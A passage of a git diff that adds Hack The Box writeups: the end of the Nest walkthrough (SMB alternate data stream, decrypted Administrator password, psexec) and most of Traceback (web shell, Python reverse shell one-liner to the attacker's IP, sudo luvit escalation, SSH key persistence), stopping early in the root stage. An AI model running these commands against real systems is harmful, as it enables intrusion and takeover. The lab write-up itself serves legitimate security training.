+ AD Integration Module D 0 Fri Aug 9 14:18:42 2019
+ Debug Mode Password.txt A 0 Fri Aug 9 01:08:17 2019
+ HQK_Config_Backup.xml A 249 Fri Aug 9 01:09:05 2019
+
+ 10485247 blocks of size 4096. 6543251 blocks available
+
+ smb: \c.smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
+ altname: DEBUGM~1.TXT
+ create_time: Fri Aug 9 01:06:12 AM 2019 CEST
+ access_time: Fri Aug 9 01:06:12 AM 2019 CEST
+ write_time: Fri Aug 9 01:08:17 AM 2019 CEST
+ change_time: Fri Aug 9 01:08:17 AM 2019 CEST
+ attributes: A (20)
+ stream: [::$DATA], 0 bytes
+ stream: [:Password:$DATA], 15 bytes
+
+ smb: \c.smith\HQK Reporting\>
+
+
+Now here we see something interesting, we get hinted at a file called **Debug Mode Password.txt** , and it has file attributes, or Alternate Data Streams (ADS) attached to it. So let's get the file itself:
+
+
+ smb: \c.smith\HQK Reporting\> get "Debug Mode Password.txt:Password"
+ getting file \c.smith\HQK Reporting\Debug Mode Password.txt:Password of size 15 as Debug Mode Password.txt:Password (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
+ smb: \c.smith\HQK Reporting\> exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
+ → ls -lash Debug\ Mode\ Password.txt:Password
+ 4.0K -rw-r--r-- 1 nothing nothing 15 May 28 13:05 'Debug Mode Password.txt:Password'
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
+ → cat Debug\ Mode\ Password.txt:Password
+ WBQ201953D8w
+
+
+We're going to save it because we may need it later on. Let's download the xml file and binary from teh HQK folder:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
+ → smbclient -U c.smith //10.10.10.178/Users
+ Enter WORKGROUP\c.smith's password: xRxRxPANCAK3SxRxRx
+ Try "help" to get a list of possible commands.
+
+ smb: \> cd c.smith
+
+ smb: \c.smith\> cd "HQK Reporting"
+
+ smb: \c.smith\HQK Reporting\> ls
+ . D 0 Fri Aug 9 01:06:17 2019
+ .. D 0 Fri Aug 9 01:06:17 2019
+ AD Integration Module D 0 Fri Aug 9 14:18:42 2019
+ Debug Mode Password.txt A 0 Fri Aug 9 01:08:17 2019
+ HQK_Config_Backup.xml A 249 Fri Aug 9 01:09:05 2019
+
+ 10485247 blocks of size 4096. 6543251 blocks available
+
+ smb: \c.smith\HQK Reporting\> get HQK_Config_Backup.xml
+ getting file \c.smith\HQK Reporting\HQK_Config_Backup.xml of size 249 as HQK_Config_Backup.xml (1.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
+
+ smb: \c.smith\HQK Reporting\> cd "AD Integration Module"
+
+ smb: \c.smith\HQK Reporting\AD Integration Module\> ls
+ . D 0 Fri Aug 9 14:18:42 2019
+ .. D 0 Fri Aug 9 14:18:42 2019
+ HqkLdap.exe A 17408 Thu Aug 8 01:41:16 2019
+
+ 10485247 blocks of size 4096. 6543251 blocks available
+
+ smb: \c.smith\HQK Reporting\AD Integration Module\> get HqkLdap.exe
+ getting file \c.smith\HQK Reporting\AD Integration Module\HqkLdap.exe of size 17408 as HqkLdap.exe (98.8 KiloBytes/sec) (average 56.5 KiloBytes/sec)
+
+
+So here's what the xml file has:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/22 ] [~/HTB/Nest]
+ → cat HQK_Config_Backup.xml
+ <****?xml version="1.0"?> <****ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <****Port>4386 <****/Port> <****QueryDirectory>C:\Program Files\HQK\ALL QUERIES <****/QueryDirectory> <****/ServiceSettings>%
+
+So here we get the configuration file for the service running on port 4386, let's try to connect to it using telnet:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/22 ] [~/HTB/Nest]
+ → telnet 10.10.10.178 4386
+ Trying 10.10.10.178...
+ Connected to 10.10.10.178.
+ Escape character is '^]'.
+
+ HQK Reporting Service V1.2
+
+ >help
+
+ This service allows users to run queries against databases using the legacy HQK format
+
+ --- AVAILABLE COMMANDS ---
+
+ LIST
+ SETDIR <****Directory_Name>
+ RUNQUERY <****Query_ID>
+ DEBUG <****Password>
+ HELP <****Command>
+
+ >LIST
+
+ Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
+
+ QUERY FILES IN CURRENT DIRECTORY
+
+ [DIR] COMPARISONS
+ [1] Invoices (Ordered By Customer)
+ [2] Products Sold (Ordered By Customer)
+ [3] Products Sold In Last 30 Days
+
+ Current Directory: ALL QUERIES
+ >1
+
+ Unrecognised command
+ >RUNQUERY 1
+
+ Invalid database configuration found. Please contact your system administrator
+
+ Invalid database configuration found. Please contact your system administrator
+ >SETDIR C:\
+
+ Current directory set to C:
+ >DEBUG
+
+ Invalid number of arguments specified
+ >DEBUG WBQ201953D8w
+
+ Debug mode enabled. Use the HELP command to view additional commands that are now available
+
+And here you see that we needed the password from earlier to properly use the DEBUG command, now from here we get a few additional commands:
+
+
+ >HELP
+
+ This service allows users to run queries against databases using the legacy HQK format
+
+ --- AVAILABLE COMMANDS ---
+
+ LIST
+ SETDIR <****Directory_Name>
+ RUNQUERY <****Query_ID>
+ DEBUG <****Password>
+ HELP <****Command>
+ SERVICE
+ SESSION
+ SHOWQUERY <****Query_ID>
+
+We get access to the commands named **SERVICE** , **SESSION** , **SHOWQUERY**
+
+
+ >SERVICE
+
+ --- HQK REPORTING SERVER INFO ---
+
+ Version: 1.2.0.0
+ Server Hostname: HTB-NEST
+ Server Process: "C:\Program Files\HQK\HqkSvc.exe"
+ Server Running As: Service_HQK
+ Initial Query Directory: C:\Program Files\HQK\ALL QUERIES
+
+
+Here we get hinted towards the **C:\Program Files\HQK\** directory:
+
+
+ >SETDIR C:\Program Files\HQK
+
+ Current directory set to HQK
+ >LIST
+
+ Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
+
+ QUERY FILES IN CURRENT DIRECTORY
+
+ [DIR] ALL QUERIES
+ [DIR] LDAP
+ [DIR] Logs
+ [1] HqkSvc.exe
+ [2] HqkSvc.InstallState
+ [3] HQK_Config.xml
+
+ Current Directory: HQK
+
+
+
+Let's take a look at the LDAP directory:
+
+
+ >SETDIR LDAP
+
+ Current directory set to LDAP
+ >LIST
+
+ Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
+
+ QUERY FILES IN CURRENT DIRECTORY
+
+ [1] HqkLdap.exe
+ [2] Ldap.conf
+
+ Current Directory: LDAP
+
+ >SHOWQUERY 2
+
+ Domain=nest.local
+ Port=389
+ BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
+ User=Administrator
+ Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
+
+
+
+And here we get credentials! Although this is still an encrypted password for the Administrator User, Just like before we need the following arguements to decrypt it: **passphrase / saltvalue / passwordIterations / initVector / keySize** And to find those, we need to decompile the **HqkLdap.exe** binary and we can do it using [ILSpy](https://github.com/icsharpcode/ILSpy).
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/23 ] [~/HTB/Nest]
+ → git clone https://github.com/icsharpcode/ILSpy
+
+ [ 10.10.14.13/23 ] [ /dev/pts/23 ] [HTB/Nest/ILSpy]
+ → git submodule update --init --recursive
+ Submodule 'ILSpy-tests' (https://github.com/icsharpcode/ILSpy-tests) registered for path 'ILSpy-tests'
+ Cloning into '/home/nothing/HTB/Nest/ILSpy/ILSpy-tests'...
+ Submodule path 'ILSpy-tests': checked out 'aa8f1197e6a513bcc10bcc38ec7d2143d27a2246'
+
+
+
+And from there, you decompile the **HqkLdap.exe** binary file, and get the following parameters from the reversed code:
+
+
+ #passPhrase = **667912**
+ #saltValue = **1313Rf99**
+ #passwordIterations = **3**
+ #initVector = **1L1SA61493DRV53Z**
+ #keySize = **256**
+
+
+
+Just like before we change the decrypt.cs code to have the aforementionned values, and we decrypt the password:
+
+
+
+Then we compile it, and run it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → mcs decrypt.cs
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → ./decrypt.exe
+ Plaintext: XtH4nkS4Pl4y1nGX
+
+
+And that's it ! We managed to get the Administrator password. So let's get onto the box using psexec.py:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/22 ] [~/HTB/Nest]
+ → locate psexec.py
+ /home/nothing/HTB/Forest/impacket/build/scripts-3.9/psexec.py
+ /home/nothing/HTB/Forest/impacket/examples/psexec.py
+ /usr/local/bin/psexec.py
+ /usr/local/lib/python3.9/dist-packages/impacket-0.9.23.dev1+20210519.170900.2f5c2476-py3.9.egg/EGG-INFO/scripts/psexec.py
+ /usr/share/doc/python3-impacket/examples/psexec.py
+ /usr/share/powershell-empire/lib/modules/powershell/lateral_movement/invoke_psexec.py
+ /usr/share/set/src/fasttrack/psexec.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/22 ] [~/HTB/Nest]
+ → python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:XtH4nkS4Pl4y1nGX@10.10.10.178
+ Impacket v0.9.23.dev1+20210519.170900.2f5c2476 - Copyright 2020 SecureAuth Corporation
+
+ [*] Requesting shares on 10.10.10.178.....
+ [*] Found writable share ADMIN$
+ [*] Uploading file xKwELIZm.exe
+ [*] Opening SVCManager on 10.10.10.178.....
+ [*] Creating service mWKI on 10.10.10.178.....
+ [*] Starting service mWKI.....
+ [!] Press help for extra shell commands
+ Microsoft Windows [Version 6.1.7601]
+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>systeminfo
+
+ Host Name: HTB-NEST
+ OS Name: Microsoft Windows Server 2008 R2 Standard
+ OS Version: 6.1.7601 Service Pack 1 Build 7601
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Standalone Server
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 00477-179-0000007-84361
+ Original Install Date: 8/5/2019, 9:22:30 PM
+ System Boot Time: 5/28/2021, 7:32:37 AM
+ System Manufacturer: VMware, Inc.
+ System Model: VMware Virtual Platform
+ System Type: x64-based PC
+ Processor(s): 1 Processor(s) Installed.
+ [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume1
+ System Locale: en-us;English (United States)
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC) Dublin, Edinburgh, Lisbon, London
+ Total Physical Memory: 2,047 MB
+ Available Physical Memory: 1,546 MB
+ Virtual Memory: Max Size: 4,095 MB
+ Virtual Memory: Available: 3,653 MB
+ Virtual Memory: In Use: 442 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: WORKGROUP
+ Logon Server: N/A
+ Hotfix(s): 68 Hotfix(s) Installed.
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: Intel(R) PRO/1000 MT Network Connection
+ Connection Name: Local Area Connection
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.178
+ [02]: fe80::f144:55c1:5e8a:4cbd
+ [03]: dead:beef::f144:55c1:5e8a:4cbd
+ C:\Windows\system32>cd C:\Users\Administrator\Desktop
+
+ C:\Users\Administrator\Desktop>type root.txt
+ 65XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/43.md b/Easy/43.md
new file mode 100644
index 0000000..c49ad48
--- /dev/null
+++ b/Easy/43.md
@@ -0,0 +1,494 @@
+# Traceback Writeup
+
+
+
+## Introduction :
+
+Traceback is an easy linux box released back in march 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → nmap -vvv -p- 10.10.10.181 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.181
+ Discovered open port 22/tcp on 10.10.10.181
+
+ [ 10.10.14.13/23 ] [ /dev/pts/7 ] [~/HTB/Traceback]
+ → nmap -sCV -p80,22 10.10.10.181
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-28 22:24 CEST
+ Nmap scan report for 10.10.10.181
+ Host is up (0.033s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
+ | 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
+ |_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
+ 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ |_http-title: Help us
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80, so let's investigate it:
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://10.10.10.181/
+
+
+We can run a gobuster scan but it doesn't help us, so let's investigate further:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → curl 10.10.10.181
+
+
+
+
+
+ # This site has been owned
+
+
+
+
+ ## I have left a backdoor for all the net. FREE INTERNETZZZ
+
+
+
+
+ ### - Xh4H -
+
+
+ <****!--Some of the best web shells that you might need ;)--****>
+
+
+
+
+As we curl the website's sourcecode, we see a comment **'Some of the best web shells you might need'** , if we look for this comment on github we find the following repository:
+
+
+
+And so we know what are the php files on this webserver, and we can save them in a textfile:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → cat files.txt
+ alfa3.php
+ alfav3.0.1.php
+ andela.php
+ bloodsecv4.php
+ by.php
+ c99ud.php
+ cmd.php
+ configkillerionkros.php
+ jspshell.jspmini.php
+ obfuscated-punknopass.php
+ punk-nopass.php
+ punkholic.php
+ r57.php
+ smevk.php
+ wso2.8.5.php
+
+
+
+So we run our gobuster scan with our textfile:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → gobuster dir -u http://10.10.10.181 -w files.txt
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://10.10.10.181
+ [+] Method: GET
+ [+] Threads: 10
+ [+] Wordlist: files.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/05/29 09:57:50 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /smevk.php (Status: 200) [Size: 1261]
+
+ ===============================================================
+ 2021/05/29 09:57:50 Finished
+ ===============================================================
+
+
+
+So let's investigate the page we found :
+
+
+
+We login with the default credentials **admin:admin** , which leads us to one of the worst looking php shells of all time:
+
+
+
+And we can execute commands as the webadmin user, and we can use python3 to get a reverse shell:
+
+
+ $ which python3
+ /usr/bin/python3
+
+ $ python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' &
+
+
+
+And then we simply catch the incoming reverse shell connection on our port 9001:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.181] 54782
+ bash: cannot set terminal process group (680): Inappropriate ioctl for device
+ bash: no job control in this shell
+ webadmin@traceback:/var/www/html$ id
+ id
+ uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
+ webadmin@traceback:/var/www/html$ ls
+ ls
+ bg.jpg
+ index.html
+ smevk.php
+ webadmin@traceback:/var/www/html$
+
+
+And we get a shell as the webadmin user!
+
+
+ webadmin@traceback:/var/www/html$ ls ~
+ ls ~
+ note.txt
+
+ webadmin@traceback:/var/www/html$ cd ~
+ cd ~
+ webadmin@traceback:/home/webadmin$ ls -lash
+ ls -lash
+ total 44K
+ 4.0K drwxr-x--- 5 webadmin sysadmin 4.0K Apr 22 06:08 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Aug 25 2019 ..
+ 4.0K -rw------- 1 webadmin webadmin 105 Mar 16 2020 .bash_history
+ 4.0K -rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout
+ 4.0K -rw-r--r-- 1 webadmin webadmin 3.7K Aug 23 2019 .bashrc
+ 4.0K drwx------ 2 webadmin webadmin 4.0K Aug 23 2019 .cache
+ 4.0K drwxrwxr-x 3 webadmin webadmin 4.0K Apr 22 06:08 .local
+ 4.0K -rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history
+ 4.0K -rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile
+ 4.0K drwxrwxr-x 2 webadmin webadmin 4.0K Feb 27 2020 .ssh
+ 4.0K -rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 2020 note.txt
+
+ webadmin@traceback:/var/www/html$ cat ~/note.txt
+ cat ~/note.txt
+ - sysadmin -
+ I have left a tool to practice Lua.
+ I'm sure you know where to find it.
+ Contact me if you have any question.
+
+
+As we take a look around, we see that the sysadmin left a 'tool to practice lua' so let's take a look at what the user can do:
+
+
+ webadmin@traceback:/home/webadmin$ sudo -l
+ sudo -l
+ Matching Defaults entries for webadmin on traceback:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User webadmin may run the following commands on traceback:
+ (sysadmin) NOPASSWD: /home/sysadmin/luvit
+
+
+Here we see that we have access to the luvit binary, which can be executed as sysadmin with no password. We also take a look at the user's history:
+
+
+ webadmin@traceback:/home/webadmin$ history
+ history
+ 1 ls -la
+ 2 sudo -l
+ 3 nano privesc.lua
+ 4 sudo -u sysadmin /home/sysadmin/luvit privesc.lua
+ 5 rm privesc.lua
+ 6 logout
+ 7 id
+ 8 ls
+ 9 ls ~
+ 10 cat ~/note.txt
+ 11 cd ~
+ 12 ls -lash
+ 13 sudo -l
+ 14 history
+
+
+And here you see why this box is called Traceback, the hacker didn't remove the traces of their presence, and thus we see that they were using a file called privesc.lua in alongside the the /home/sysadmin/luvit binary. So let's see what they were trying to do after we upgrade our reverse shell to a fully interactive one:
+
+
+ webadmin@traceback:/home/webadmin$ tty
+ tty
+ not a tty
+ webadmin@traceback:/home/webadmin$ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ webadmin@traceback:/home/webadmin$ ^Z #this means CTRL+Z
+ [1] + 3346006 suspended nc -lvnp 9001
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → stty raw -echo ; fg
+ [1] + 3346006 continued nc -lvnp 9001
+ webadmin@traceback:/home/webadmin$ export TERM=screen-256color
+ webadmin@traceback:/home/webadmin$ export SHELL=bash
+ webadmin@traceback:/home/webadmin$ stty rows 40 columns 125
+ webadmin@traceback:/home/webadmin$ reset
+
+
+So we can use the luvit binary to run lua code as the sysadmin user, so let's spawn a shell with it:
+
+
+ webadmin@traceback:/home/webadmin$ nano priv.lua
+
+ require('os');
+ os.execute('/bin/bash');
+
+ CTRL+S CTRL+X
+
+ webadmin@traceback:/home/webadmin$ sudo -u sysadmin /home/sysadmin/luvit ./priv.lua
+ sysadmin@traceback:/home/webadmin$ id
+ uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
+ sysadmin@traceback:/home/webadmin$ cd ~
+ sysadmin@traceback:~$ ls
+ luvit user.txt
+ sysadmin@traceback:~$ cat user.txt
+ 08XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the sysadmin user, and print the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now we don't want to do all these steps to get a shell as the sysadmin user, so we're going to add our ssh public key to ssh directly as the sysadmin user:
+
+
+ sysadmin@traceback:~$ stty rows 80 columns 200
+ sysadmin@traceback:~$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBxPko22MsKasagzuR1ikUtC3idsATUzCyCbU1qCZRmf nothing@nowhere' >> ~/.ssh/authorized_keys
+
+ sysadmin@traceback:~$ exit
+ exit
+ webadmin@traceback:/home/webadmin$ exit
+ exit
+ webadmin@traceback:/home/webadmin$ exit
+ exit
+ %
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → exit
+
+
+Then ssh as the sysadmin user with the associated private key:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/Traceback]
+ → ssh sysadmin@10.10.10.181 -i ~/.ssh/id_ed25519
+ The authenticity of host '10.10.10.181 (10.10.10.181)' can't be established.
+ ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.181' (ECDSA) to the list of known hosts.
+ #################################
+ -------- OWNED BY XH4H ---------
+ - I guess stuff could have been configured better ^^ -
+ #################################
+
+ Welcome to Xh4H land
+
+
+
+ Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2
+ $ bash
+ sysadmin@traceback:~$ id
+ uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
+
+
+Now in order to privesc to the root user, we need to monitor the processes that are running on the server, especially if there are any that are being run regularly by the root user, and to do so we can use [pspy](https://github.com/DominicBreuker/pspy):
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/7 ] [~/HTB/Traceback]
+ → wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
+ --2021-05-29 10:45:10-- https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://github-releases.githubusercontent.com/120821432/d54f2200-c51c-11e9-9594-737e4ba5e6fe?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20210529%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20210529T084505Z&X-Amz-Expires;=300&X-Amz-Signature;=ef1682d371721693120b61f6e0d48ee367f1f0008248f94748c01642371207f1&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=120821432&response-content-disposition;=attachment%3B%20filename%3Dpspy64s&response-content-type;=application%2Foctet-stream [following]
+ --2021-05-29 10:45:10-- https://github-releases.githubusercontent.com/120821432/d54f2200-c51c-11e9-9594-737e4ba5e6fe?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20210529%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20210529T084505Z&X-Amz-Expires;=300&X-Amz-Signature;=ef1682d371721693120b61f6e0d48ee367f1f0008248f94748c01642371207f1&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=120821432&response-content-disposition;=attachment%3B%20filename%3Dpspy64s&response-content-type;=application%2Foctet-stream
+ Resolving github-releases.githubusercontent.com (github-releases.githubusercontent.com)... 185.199.108.154, 185.199.110.154, 185.199.111.154, ...
+ Connecting to github-releases.githubusercontent.com (github-releases.githubusercontent.com)|185.199.108.154|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 1156536 (1.1M) [application/octet-stream]
+ Saving to: ‘pspy64s’
+
+ pspy64s 100%[=====================================================================================================================================================>] 1.10M 3.50MB/s in 0.3s
+
+ 2021-05-29 10:45:11 (3.50 MB/s) - ‘pspy64s’ saved [1156536/1156536]
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/7 ] [~/HTB/Traceback]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ sysadmin@traceback:~$ which curl wget
+ /usr/bin/wget
+
+ sysadmin@traceback:~$ wget http://10.10.14.13:9090/pspy64s -O /dev/shm/pspy
+ --2021-05-29 01:54:04-- http://10.10.14.13:9090/pspy64s
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 1156536 (1.1M) [application/octet-stream]
+ Saving to: ‘/dev/shm/pspy’
+
+ /dev/shm/pspy 100%[=====================================================================================================================================================>] 1.10M 312KB/s in 3.5s
+
+ 2021-05-29 01:54:07 (321 KB/s) - ‘/dev/shm/pspy’ saved [1156536/1156536]
+
+ sysadmin@traceback:~$ chmod +x /dev/shm/pspy
+ sysadmin@traceback:~$ /dev/shm/pspy
+ pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
+
+
+ ██▓███ ██████ ██▓███ ▓██ ██▓
+ ▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
+ ▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
+ ▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
+ ▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
+ ▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
+ ░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
+ ░░ ░ ░ ░ ░░ ▒ ▒ ░░
+ ░ ░ ░
+ ░ ░
+
+ Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
+ Draining file system events due to startup...
+ done
+
+ [...]
+
+ 2021/05/29 01:54:21 CMD: UID=1001 PID=1310 | /dev/shm/pspy
+ 2021/05/29 01:54:21 CMD: UID=0 PID=1305 | sleep 30
+ 2021/05/29 01:54:21 CMD: UID=0 PID=1304 | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
+ 2021/05/29 01:54:21 CMD: UID=0 PID=1302 | /usr/sbin/CRON -f
+ 2021/05/29 01:54:21 CMD: UID=0 PID=13 |
+ 2021/05/29 01:54:21 CMD: UID=1001 PID=1236 | bash
+ 2021/05/29 01:54:21 CMD: UID=1001 PID=1226 | -sh
+ 2021/05/29 01:54:21 CMD: UID=1001 PID=1224 | sshd: sysadmin@pts/0
+ 2021/05/29 01:54:21 CMD: UID=0 PID=121 |
+ 2021/05/29 01:54:21 CMD: UID=1001 PID=1200 | (sd-pam)
+ 2021/05/29 01:54:21 CMD: UID=0 PID=12 |
+ 2021/05/29 01:54:21 CMD: UID=1001 PID=1199 | /lib/systemd/systemd --user
+ 2021/05/29 01:54:21 CMD: UID=0 PID=1197 | sshd: sysadmin [priv]
+ 2021/05/29 01:54:31 CMD: UID=0 PID=1323 | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/
+
+ [...]
+
+
+
+
+Here we see that the UID 0 (the root user) runs the **cp** command from **/var/backups/.update-motd.d/** to the **/etc/update-motd.d/** directory.
+
+
+ sysadmin@traceback:~$ ls -lash /etc/update-motd.d/
+ total 32K
+ 4.0K drwxr-xr-x 2 root sysadmin 4.0K Apr 22 06:08 .
+ 4.0K drwxr-xr-x 80 root root 4.0K Apr 22 06:08 ..
+ 4.0K -rwxrwxr-x 1 root sysadmin 981 May 29 01:58 00-header
+ 4.0K -rwxrwxr-x 1 root sysadmin 982 May 29 01:58 10-help-text
+ 8.0K -rwxrwxr-x 1 root sysadmin 4.2K May 29 01:58 50-motd-news
+ 4.0K -rwxrwxr-x 1 root sysadmin 604 May 29 01:58 80-esm
+ 4.0K -rwxrwxr-x 1 root sysadmin 299 May 29 01:58 91-release-upgrade
+ sysadmin@traceback:~$ cat /etc/update-motd.d/00-header
+ #!/bin/sh
+ #
+ # 00-header - create the header of the MOTD
+ # Copyright (C) 2009-2010 Canonical Ltd.
+ #
+ # Authors: Dustin Kirkland <****kirkland@canonical.com>
+ #
+ # This program is free software; you can redistribute it and/or modify
+ # it under the terms of the GNU General Public License as published by
+ # the Free Software Foundation; either version 2 of the License, or
+ # (at your option) any later version.
+ #
+ # This program is distributed in the hope that it will be useful,
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
